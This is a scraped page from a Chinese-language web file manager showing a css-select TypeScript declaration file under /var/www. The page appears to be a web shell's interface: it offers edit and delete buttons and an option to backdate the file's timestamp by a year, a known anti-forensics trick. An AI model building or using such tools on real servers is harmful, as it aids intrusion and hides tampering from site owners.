文件操作 - sort.d.ts
返回文件管理
返回主菜单
删除本文件
文件: /var/www/OLD/node_modules/vite-plugin-svg-icons/node_modules/css-select/lib/sort.d.ts
编辑文件内容
import type { InternalSelector } from "./types"; /** * Sort the parts of the passed selector, * as there is potential for optimization * (some types of selectors are faster than others) * * @param arr Selector to sort */ export default function sortByProcedure(arr: InternalSelector[]): void; //# sourceMappingURL=sort.d.ts.map
修改文件时间
将文件时间修改为当前时间的前一年
删除文件